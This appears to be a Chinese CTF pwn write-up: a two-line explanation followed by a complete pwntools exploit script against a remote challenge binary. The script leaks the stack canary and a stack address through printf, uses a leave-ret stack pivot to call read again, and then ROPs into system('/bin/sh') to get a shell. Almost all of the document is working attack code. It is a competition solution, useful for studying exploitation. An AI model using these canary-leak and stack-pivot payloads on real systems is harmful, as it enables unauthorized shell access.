re 题,硬逆就完了
在输入密码这里可以通过 printf 函数泄露 canary 和 stack
在结局0这里发现了栈迁移漏洞,题目自带 system,不过栈迁移的话只能用两个指令,所以再用 read 读一次然后调用 system(b'/bin/sh')
from struct import pack from ctypes import * #from LibcSearcher import * context(os='linux', arch='amd64', log_level='debug') def s(a) : p.send(a) def sa(a, b) : p.sendafter(a, b) def sl(a) : p.sendline(a) def sla(a, b) : p.sendlineafter(a, b) def r() : return p.recv() def pr() : print(p.recv()) def rl(a) : return p.recvuntil(a) def inter() : p.interactive() def debug(): gdb.attach(p) pause() def get_addr() : return u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00')) def get_sb() : return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/sh\x00')) def csu(rdi, rsi, rdx, rip, gadget) : return p64(gadget) + p64(0) + p64(1) + p64(rip) + p64(rdi) + p64(rsi) + p64(rdx) + p64(gadget - 0x1a) #p = process('./pwn') p = remote('1.14.71.254', 28392) elf = ELF('./pwn') libc = ELF('/home/w1nd/Desktop/glibc-all-in-one/libs/2.27-3ubuntu1.5_amd64/libc-2.27.so') rdi = 0x402bb3 ret = 0x40101a leave = 0x401337 sla(b'1.', b'1') sl(b'xshhc') sla(b'2.', b'1') sla(b'2.', b'2') for i in range(3): s(b'\n') sla(b'2.', b'2') for i in range(10): s(b'\n') sla(b'2.', b'2') pr() for i in range(2): s(b'\n') sla(b'xshhc', b'20161226') for i in range(3): s(b'\n') s(b'a'*0x19) rl(b'a'*0x19) canary = u64(p.recv(7).rjust(8, b'\x00')) stack = get_addr() #gdb.attach(p, 'b *0x402afb') for i in range(5): s(b'\n') sl(b'3') for i in range(11): s(b'\n') sl(b'3') for i in range(18): s(b'\n') payload = b'a'*8 + p64(elf.sym['read']) + b'a'*8 + p64(canary) + p64(stack - 0x100) + p64(leave) s(payload) sleep(0.5) payload = b'/bin/sh\x00'*2 + p64(rdi) + p64(stack - 0xf8) + p64(elf.sym['system']) s(payload) print(' canary -> ', hex(canary)) print(' stack -> ', hex(stack)) inter() pause()